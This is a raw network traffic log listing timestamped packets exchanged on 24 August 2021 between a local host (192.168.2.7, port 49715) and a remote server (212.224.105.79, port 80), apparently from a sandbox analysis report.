Aug 24, 2021 08:46:56.806260109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806266069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806298018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806329966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806359053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806370020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806390047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806394100 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806421041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806448936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806478024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806485891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806509018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806515932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806545973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806579113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806607962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806617975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806638956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806649923 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806670904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806699038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806727886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806731939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806762934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806768894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806812048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806844950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806874037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806885004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806905031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806915998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806936979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806966066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806996107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807003021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.807028055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807029009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.807065010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807097912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807142019 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.807207108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807240963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807251930 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.807271004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807307959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807341099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807353020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.807370901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807382107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.807401896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807432890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807461977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.807472944 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.807501078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.808805943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.808860064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.808892965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.808923006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.808953047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.809277058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.829611063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829658985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829679966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829715967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829719067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.829734087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829778910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.829783916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829799891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.829802036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829823971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829845905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829845905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.829870939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829907894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829920053 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.829951048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829952955 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.829967976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.829991102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830013990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830013990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830034971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830059052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830069065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830080032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830111980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830116034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830133915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830153942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830158949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830192089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830212116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830243111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830248117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830266953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830276012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830290079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830306053 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830310106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830331087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830353022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830374002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830384016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830394030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830399036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830415010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830435038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830440044 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830454111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830473900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830475092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830495119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830512047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830518007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830538034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830563068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830585003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830600977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830625057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830626011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830646038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830667019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830672979 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830687046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830708981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830714941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830728054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830749035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830764055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830768108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830792904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830802917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830812931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830832958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830842972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830853939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830873966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830877066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830895901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830915928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830936909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830938101 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830959082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.830965042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.830981016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831001997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831008911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.831021070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831043005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831046104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.831062078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831082106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831101894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831103086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.831135035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.831172943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831231117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831248045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831273079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831278086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.831296921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831307888 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.831320047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.831350088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.835422993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.849976063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853172064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853215933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853252888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853290081 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853298903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853329897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853338957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853377104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853414059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853437901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853454113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853457928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853492975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853530884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853565931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853571892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853609085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853624105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853658915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853679895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853714943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853723049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853734970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853755951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853770971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853805065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853827000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853854895 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853868008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853876114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853904963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853926897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.853950024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.853970051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854011059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854038000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854047060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854084969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854119062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854136944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854150057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854161978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854173899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854195118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854207039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854219913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854226112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854231119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854243040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854252100 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854262114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854279041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854295969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854299068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854311943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854321003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854329109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854343891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854358912 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854360104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854379892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854383945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854398012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854413986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854427099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854429960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854445934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854451895 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854461908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854476929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854492903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854506969 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854511976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854530096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854537964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854547024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854562998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854562998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854579926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854594946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854602098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854656935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854657888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854676008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854691029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854707003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854723930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854724884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854739904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854748011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854752064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854763985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854775906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854775906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854809999 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854814053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854826927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854831934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854855061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.854882956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.854887962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.855139971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.857650995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.857676983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.857700109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.857724905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.857737064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.857749939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.857783079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.857808113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.857901096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.877209902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877286911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877362013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877419949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877477884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877535105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877588987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877645016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877697945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877747059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877794981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877836943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877839088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.877875090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877897978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.877914906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.877960920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878007889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878014088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878058910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878067970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878118038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878179073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878226042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878238916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878283978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878293037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878345013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878397942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878446102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878449917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878494024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878504038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878552914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878609896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878659010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878751993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878808022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.878813982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878875971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878930092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.878971100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879009008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879045963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879050016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879091024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879133940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879204988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879251003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879277945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879291058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879331112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879378080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879394054 CEST	49715	80	192.168.2.7	212.224.105.79
